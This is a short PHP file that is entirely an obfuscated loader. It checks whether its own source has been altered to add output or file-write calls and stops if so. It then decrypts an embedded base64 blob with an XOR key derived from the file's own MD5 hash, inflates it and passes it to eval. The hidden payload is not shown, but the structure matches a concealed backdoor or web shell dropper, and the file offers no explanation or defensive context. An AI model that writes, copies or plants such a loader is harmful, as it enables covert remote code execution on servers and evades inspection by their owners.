<?php
$qylcyr="9c356338d9fceb06879997107b17414e";
$rstqgh="0d0202015205070d01095157570609020d025c5a09060000535a050e0d065603";
$elsdpxrq="h9ZihK0GhobUh2K8vbNpG3sbLy79Gud7SHcYcxDhqSt5KP0dMuFghdKD5jMYN4mFGv1NM/h9YuA0dPkUEZ62NrXJvftM//nksYQ1HmZkoLEZOXRg2Xr8GSq9HBD5UgE4Sl27kWFGiUxMqV7iMg==";
$gqfpjsvupm=file_get_contents(__FILE__);
$jykzyo=str_replace($elsdpxrq,"",$gqfpjsvupm);
if(strpos($jykzyo,"ec"."ho")!==false||strpos($jykzyo,"pr"."int")!==false||strpos($jykzyo,"var_"."dump")!==false||strpos($jykzyo,"file_put_"."contents")!==false||strpos($jykzyo,"fw"."rite")!==false){die();}
$xrmzhrfi=str_replace(array($qylcyr,$rstqgh),array("SP_c40bbf33","KP_bbaf1270"),$gqfpjsvupm);
$liobupczyfw=md5($xrmzhrfi);
$goikrcrhvquz=hex2bin($rstqgh);
$dctadfzbtiaz="";
$ezsgxtwr=strlen($liobupczyfw);
for($elpxwgvbkzr=0;$elpxwgvbkzr<$ezsgxtwr;$elpxwgvbkzr++){
    $dctadfzbtiaz.=chr(ord($goikrcrhvquz[$elpxwgvbkzr])^ord($liobupczyfw[$elpxwgvbkzr]));
}
$kvbzify=base64_decode($elsdpxrq);
$prnnirsh=strlen($kvbzify);
$ruaqmy="";
$geolgjz=strlen($dctadfzbtiaz);
for($elpxwgvbkzr=0;$elpxwgvbkzr<$prnnirsh;$elpxwgvbkzr++){
    $ruaqmy.=$kvbzify[$elpxwgvbkzr]^$dctadfzbtiaz[$elpxwgvbkzr%$geolgjz];
}
$hupbpa="gz"."in"."fl"."ate";
eval($hupbpa($ruaqmy));
